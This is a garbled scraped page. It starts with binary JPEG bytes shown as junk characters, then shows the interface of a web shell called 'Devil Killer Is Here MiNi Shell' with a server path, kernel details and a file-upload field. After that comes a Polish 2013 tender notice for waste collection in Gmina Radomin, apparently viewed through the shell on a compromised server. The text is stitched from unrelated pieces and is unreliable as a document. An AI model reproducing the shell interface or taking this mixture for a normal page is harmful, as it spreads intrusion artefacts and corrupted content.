JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130606/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130606/218672-N-2013.html

<p class="kh_header"><b>Radomin: Odbieranie i zagospodarowanie  odpadów  komunalnych  z  nieruchomości na terenie   Gminy Radomin</b><br>
<b>Numer ogłoszenia: 218672 - 2013; data zamieszczenia: 06.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Radomin , Radomin 1a, 87-404 Radomin, woj. kujawsko-pomorskie, tel. 056 6837522.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radomin.pl i www.bip.radomin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbieranie i zagospodarowanie  odpadów  komunalnych  z  nieruchomości na terenie   Gminy Radomin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1.Przedmiotem  zamówienia  jest usługa  polegająca na odbieraniu odpadów komunalnych  zbieranych selektywnie (po segregacji przez właściciela lub użytkownika nieruchomości w miejscu ich wytworzenia) i niesegregowanych (zmieszanych), od właścicieli z wszystkich nieruchomości  (zamieszkałych i niezamieszkałych) położonych na terenie Gminy Radomin oraz transport i zagospodarowanie zebranych odpadów, w okresie obowiązywania umowy.
1.2. Zamówienie obejmuje wyposażenie nieruchomości zamieszkałych i niezamieszkałych  w worki na odpady zbierane selektywnie (segregowane) i pojemniki na odpady zmieszane (niesegregowane), w terminie do 30.06.2013r.Wykaz worków i pojemników (ilość i pojemność) określono  przez Zamawiającego  w  ogłoszeniu o zamówieniu oraz Specyfikacji Istotnych Warunków Zamówienia.
1.3. W ramach zamówienia, Wykonawca zobowiązany jest do transportu i przekazania  odpadów do  Regionalnej Instalacji Przetwarzania Odpadów Komunalnych Region 3 Lipnowsko-Rypiński, dla zapewnienia osiągnięcia  odpowiednich poziomów recyklingu, przygotowania do ponownego użycia   i odzysku innymi metodami oraz ograniczenie  masy odpadów ulegających biodegradacji, przekazywanych do składowania.
1.4. Wykonawca w ramach zamówienia, obowiązany jest do zbierania  odpadów, w okresach,  jak zapisano w  uchwałach  Rady Gminy Radomin, podanych  w   niniejszym ogłoszeniu i SIWZ;
1.5.  Przystępując do przetargu, Wykonawca zobowiązany jest  w trakcie wykonania zamówienia- usługi, do przestrzegania i stosowania następujących ustaw,  rozporządzeń, planów, regulaminów i programów, a mianowicie:
a) Ustawy z dnia  13 września 1996r.  o utrzymaniu czystości i porządku w gminach ( Dz. U. z 2012r.  poz. 391 i 951);
b)Rozporządzenia  Ministra Środowiska  z dnia 11 stycznia  2013r.- w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U. z 2013r. poz. 122);
c) Rozporządzenia Ministra Środowiska  z dnia 15 maja 2012r. w sprawie  wzorów sprawozdań  o odebranych odpadach komunalnych, odebranych  nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi  (Dz. U. z 2012r. poz. 630);
d) Ustawy z dnia  14 grudnia 2012r. o odpadach (Dz. U. z 2013r. poz. 21)
e)Ustawy z dnia  27 kwietnia 2001r.  Prawo ochrony środowiska  ( Dz. U. z 2008r. Nr 25 poz. 150 z późn. zmian. 
f) Ustawy z dnia  29 lipca 2005r.  o zużytym sprzęcie elektrycznym i elektronicznym ( Dz. U. z 2005r. Nr 180, poz. 1495 z późn. zmian);
g) Ustawy  z dnia  24 kwietnia 2009r. o bateriach i akumulatorach  ( Dz. U. z 2009r. Nr 79 poz. 666 z poź. zmian.);
h) Rozporządzenia  Ministra Środowiska z dnia 8 grudnia  2010r. w sprawie zakresu informacji oraz wzorów formularzy służących do sporządzenia i przekazywania zbiorczych zestawień danych ( Dz. U z 2010r. Nr 249, poz. 1674);
i) Rozporządzenia  Ministra Środowiska z dnia 8 grudnia  2010r. w sprawie wzorów dokumentów stosowanych  na potrzeby ewidencji odpadów ( Dz. U. z 2010r. Nr 249, poz. 1673); 
j) Rozporządzenia Ministra Środowiska  z dnia 25 maja  2012r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji,  przekazywanych do składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów ( Dz. U. z 2012r. poz. 676);
k) Rozporządzenia Ministra Środowiska  z dnia 29 maja 2012r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z  2012r. poz. 645);
l) Uchwały  Nr XXXIII/193/13 Rady Gminy Radomin z dnia 29 stycznia 2013r. w sprawie  przyjęcia Regulaminu utrzymania czystości i porządku na terenie gminy Radomin ( Dz. Urz. Woj. Kuj. Pom. z 2013r. poz. 709);
ł)Uchwały Nr XXXI/168/12 Rady Gminy Radomin   z dnia 28 listopada 2012r.  w sprawie odbierania odpadów komunalnych od właścicieli nieruchomości, na których nie zamieszkują mieszkańcy. (Dz. Urz. Woj. Kuj.-Pom.  z 2012 r. poz. 3202);
m)Uchwały Nr XXXII/188/12 Rady Gminy Radomin z dnia 18 grudnia 2012r. wyboru metody ustalania  opłaty za gospodarowanie odpadami komunalnymi, wysokości stawki opłaty oraz stawki za pojemnik (Dz. Urz. Woj. Kuj.-Pom. z 2012r. poz. 3834)
n)  Uchwały Nr XXXII/189/12 Rady Gminy Radomin z dnia 18 grudnia 2012r. w sprawie terminu, częstotliwości i trybu uiszczania opłaty za gospodarowanie odpadami komunalnymi (Dz. Urz. Woj. Kuj.-Pom. z 2012r. poz. 3835).
o)   Uchwały Nr XXVI/434/12 Sejmiku Województwa Kujawsko- Pomorskiego  z dnia 24 września 2012r. w sprawie uchwalenia Plan gospodarki odpadami województwa kujawsko-pomorskiego na lata 2012- 2017 z perspektywą  na lata 2018- 2023
p)  Uchwały Nr XXVI/435/12 Sejmiku Województwa Kujawsko- Pomorskiego  z dnia 24 września 2012r. w sprawie wykonania  Planu gospodarki odpadami województwa kujawsko-pomorskiego na lata 2012- 2017 z perspektywą  na lata 2018- 2023 ( Dz. Urz. Woj. Kuj.-Pom. z 2012r. poz. 2028)

2. Informacje charakteryzujące  Gminę Radomin oraz dane dotyczące  zbieranych odpadów, do  postępowania przetargowego.
a)  powierzchnia Gminy Radomin  8.077 ha (80,77  km2) 
b) ogólna  ilość nieruchomości (posesji), z których  powinny być odbierane odpady)   - około 905 i 45 nieruchomości niezamieszkanych 
c) liczba ludności   wg deklaracji 3051 osób
d)  ilość sołectw  -   16 (w tym: z integralnymi częściami  sołectw)  
Uwaga :  Zamawiający  informuje, że na potrzeby złożenia oferty należy przyjąć   około 10 % tolerancji w zakresie zmniejszenia ewentualnego zwiększenia ilości nieruchomości i liczby ludności objętych odbiorem i zagospodarowaniem odpadów.	3. Szczegółowy opis wykonania zamówienia.
3.1. Zamówienie dotyczy (odbioru i zagospodarowania) następujących rodzajów odpadów:
a)  niesegregowanych (zmieszanych) odpadów komunalnych, 
b)  selektywnie zbieranych odpadów komunalnych tj. tworzywa sztuczne, szkło, metal, papier, opakowania wielomateriałowe,  
Opis przedmiotu zamówienia oraz zakres obowiązków wykonawcy określony jest w ogłoszeniu oraz SIWZ a także zawarty jest  w projekcie  umowy. 
Specyfikacja Istotnych Warunków Zamówienia  udostępniona  jest na stronie internetowej  Urzędu Gminy Radomin: www.radomin.pl - BIP -przetargi zamówień publicznych,  po uprzednim zamieszczeniu ogłoszenia w Biuletynie Zamówień Publicznych UZP.
Wymienione dokumenty będą także udostępniane wykonawcom w siedzibie zamawiającego  - Urząd Gminy Radomin pok. Nr 15,  w godz. od 8:00 do 15:00 od poniedziałku do piątku..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.00.00-5, 90.51.12.00-4, 90.51.20.00-9, 90.51.40.00-3, 34.92.84.80-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zmawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcą zamówienia określonego w niniejszym ogłoszeniu, w rozumieniu ustawy p.z.p, może być osoba fizyczna, osoba prawna albo jednostka organizacyjna nie posiadająca osobowości prawnej, która ubiega się o udzielenie zamówienia publicznego, złożyła ofertę lub zawarła umowę w sprawie zamówienia publicznego.
VII. 1.) W przetargu mogą wziąć udział wykonawcy spełniający warunki zawarte w art. 22 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych ( Dz. U. z 2010r. Nr 113 poz. 759 z późn. zmian.),  a mianowicie:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Wykonawca składa oświadczenie o spełnianiu warunków w zakresie posiadania uprawnień do wykonywania zadań określonych w niniejszym zamówieniu . 
Wykonawca wykaże, że posiada uprawnienia do wykonywania działalności określonej w niniejszym  przedmiocie zamówienia, na podstawie aktualnych decyzji administracyjnych i  zezwoleń.
 Wykonawca zobowiązany  jest posiadać i przedstawić:
1)  aktualne zaświadczenie o wpisie do rejestru działalności regulowanej w Gminie  Radomin zgodnie z art. 9c ust. 1 ustawy o utrzymaniu czystości i porządku w gminach ( Dz. U. z 2012r. poz. 391 i 951);
Podmioty, które przed dniem wejścia w życie rozporządzenia uzyskały wpis lub złożyły wniosek o wpis do rejestru, o którym mowa w art. 9b ust. 2 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012 r., poz. 391 i 951 oraz z 2013 r. poz. 21),  które przed dniem wejścia w życie rozporządzenia prowadziły działalność w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, powinny dostosować się do wymagań wynikających z rozporządzenia w terminie 3 miesięcy od dnia wejścia w życie rozporządzenia Ministra Środowiska  z dnia 11 stycznia  2013r.- w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U. z 2013r. poz. 122);
2) zezwolenie na przetwarzanie odpadów zgodnie z art. 41 ustawy o odpadach z dnia 14 grudnia 2012 r. (Dz. U. z 2013 r. poz. 21) lub zezwolenie na prowadzenie odzysku lub unieszkodliwiania odpadów zgodnie z art. 26 Ustawy z dnia 27 kwietnia 2001 r. o odpadach 
3) zaświadczenie o wpisie do rejestru, o którym mowa w art. 49 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. z 2013 r., poz. 21) lub zezwolenie na transport odpadów zgodnie z art. 28 ustawy z  27 kwietnia 2001 r. o odpadach.
W celu potwierdzenia, że  posiada uprawnienia do wykonywania określonej działalności lub czynności, wykonawca złoży oświadczenie (Załącznik Nr 2), o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust.1 ustawy - Prawo zamówień publicznych.
Ocena spełnienia warunków wymaganych od Wykonawców, zostanie dokonana przez Zamawiającego, na zasadzie: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w ciągu ostatnich 3 lat wykonał min. 2 usługi  w zakresie objętym niniejszym zamówieniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Usługi polegające  na odbiorze  zbieranych odpadów komunalnych o  wartości nie mniejszej niż 100.000 PLN brutto każda z osobna, w stosunku 1 roku  ( jedna  usługa rozumiana jako  wartość  całości zbieranych odpadów od grupy wytwórców odpadów- np. firmy, osoby prywatne)  
W przypadku wykonania usług, których wartość wyrażona jest w innej walucie niż PLN, walutę tę należy przeliczyć na PLN według kursu NBP wg tabeli kursów średnich walut obcych opublikowanego na stronie www.nbp.pl., w dacie wykonania usługi.
Wykaz usług (Załącznik Nr 9 ) powinien zawierać informacje dotyczące wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy usługi te zostały wykonane lub są wykonywane należycie.
Dowodami są:
a) poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
b) oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o których mowa wyżej.
Ocena spełnienia warunków wymaganych od Wykonawców, zostanie dokonana przez Zamawiającego, na zasadzie: spełnia - nie spełnia-</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca będzie dysponował odpowiednim potencjałem technicznym zapewniającym realizację przedmiotu zamówienia, a mianowicie:
1. Wykonawca odbierający odpady komunalne od właścicieli nieruchomości jest obowiązany:
1.1. posiadać bazę magazynowo-transportową usytuowaną;
1)	w gminie, z której terenu odbiera te odpady, lub w odległości nie większej niż 60 km od granicy tej gminy;
2)na terenie, do którego posiada tytuł prawny.
1.2. w zakresie wyposażenia bazy magazynowo-transportowej, zapewnić, aby:
1)teren bazy magazynowo-transportowej był zabezpieczony w sposób uniemożliwiający wstęp osobom nieupoważnionym;
2)miejsca przeznaczone do parkowania pojazdów były zabezpieczone przed emisją zanieczyszczeń do gruntu;
3)miejsca magazynowania selektywnie zebranych odpadów komunalnych były zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem czynników atmosferycznych;
4)teren bazy magazynowo-transportowej był wyposażony w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych, pochodzących z terenu bazy zgodnie z wymaganiami określonymi przepisami ustawy z dnia 18 lipca 2001 r. - Prawo wodne (Dz. U. z 2012 r. poz. 145, 951 i 1513 oraz z 2013 r. poz. 21);
5)baza magazynowo-transportowa była wyposażona w:
a)miejsca przeznaczone do parkowania pojazdów,
b)pomieszczenie socjalne dla pracowników odpowiadające liczbie zatrudnionych osób,
c)miejsca do magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych,
d)legalizowaną samochodową wagę najazdową - w przypadku gdy na terenie bazy następuje magazynowanie odpadów.
1.3. na terenie bazy magazynowo-transportowej powinny znajdować się także:
1)punkt bieżącej konserwacji i napraw pojazdów,
2)miejsce do mycia i dezynfekcji pojazdów, o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy magazynowo-transportowej.
1.4. część transportowa oraz część magazynowa bazy mogą znajdować się na oddzielnych terenach, przy jednoczesnym spełnieniu warunków określonych w ust. 1.1 - 1.3.
2. W zakresie posiadania wyposażenia umożliwiającego odbieranie odpadów komunalnych od właścicieli nieruchomości oraz jego odpowiedniego stanu technicznego, Wykonawca musi  zapewnić, aby:
1)w posiadaniu  Wykonawcy odbierającego odpady komunalne od właścicieli nieruchomości znajdowały się co najmniej 2  pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych oraz co najmniej 2 pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych, a także co najmniej 1 pojazd do odbierania odpadów bez funkcji kompaktującej;
2)pojazdy były trwale i czytelnie oznakowane, w widocznym miejscu, nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości;
3)na terenie bazy magazynowo-transportowej znajdowały się urządzenia do selektywnego gromadzenia odpadów komunalnych przed ich transportem do miejsc przetwarzania.
3. W zakresie utrzymania odpowiedniego stanu sanitarnego pojazdów i urządzeń należy zapewnić, aby:
1)urządzenia, o których mowa w pkt  2. 3), były utrzymane we właściwym stanie technicznym i sanitarnym;
2)pojazdy i urządzenia były zabezpieczone przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas ich magazynowania, przeładunku, a także transportu;
3)pojazdy i urządzenia były poddawane myciu i dezynfekcji z częstotliwością gwarantującą zapewnienie im właściwego stanu sanitarnego, nie rzadziej niż raz na miesiąc, a w okresie letnim nie rzadziej niż raz na 2 tygodnie;
4)podmiot odbierający odpady komunalne od właścicieli nieruchomości posiadał aktualne dokumenty potwierdzające wykonanie czynności, o których mowa w pkt 3;
5)na koniec każdego dnia roboczego pojazdy były opróżnione z odpadów i były parkowane wyłącznie na terenie bazy magazynowo-transportowej.
4. W zakresie wymagań technicznych dotyczących wyposażenia pojazdów należy zapewnić, aby:
1)konstrukcja pojazdów zabezpieczała przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz minimalizowała oddziaływanie czynników atmosferycznych na odpady;
2)pojazdy były wyposażone w system:
a)monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów oraz
b)czujników zapisujących dane o miejscach wyładunku odpadów -	umożliwiający weryfikację tych danych;
3)pojazdy były wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników.
Dopuszcza się wyposażenie pojazdów w urządzenie do ważenia odpadów komunalnych. W celu potwierdzenia, że dysponuje odpowiednim potencjałem technicznym, wymienionym powyżej wykonawca złoży oświadczenie (Załącznik Nr 2), o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust.1 ustawy - Prawo zamówień publicznych oraz wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy  usług wraz z informacją o podstawie do dysponowania tymi zasobami ( Załącznik Nr 9)
Ocena spełnienia warunków wymaganych od Wykonawców, zostanie dokonana przez Zamawiającego, na zasadzie: spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do  wykonania zamówienia, Wykonawca wykaże, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają kwalifikacje zawodowe, doświadczenie niezbędne do wykonania zamówienia oraz zakres wykonywanych przez nie czynności, a także informacje o podstawie do dysponowania tymi osobami. Wymagane jest złożenie oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy, w oparciu o które wykonywane będzie zamówienie, nakładają obowiązek posiadania takich uprawnień.
W celu potwierdzenia, że osoby posiadają kwalifikacje zawodowe, doświadczenie niezbędne do wykonania zamówienia,   wykonawca złoży oświadczenie (Załącznik Nr 8), o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust.1 ustawy - Prawo zamówień publicznych.
Ocena spełnienia warunków wymaganych od Wykonawców, zostanie dokonana przez Zamawiającego,  na zasadzie: spełnia - nie spełnia-</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej (opłaconą polisę ubezpieczeniową) w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, w kwocie  odpowiadającej wartości zamówienia w składanej ofercie.
Ocena spełnienia warunków wymaganych od Wykonawców, zostanie dokonana przez Zamawiającego, na zasadzie: spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

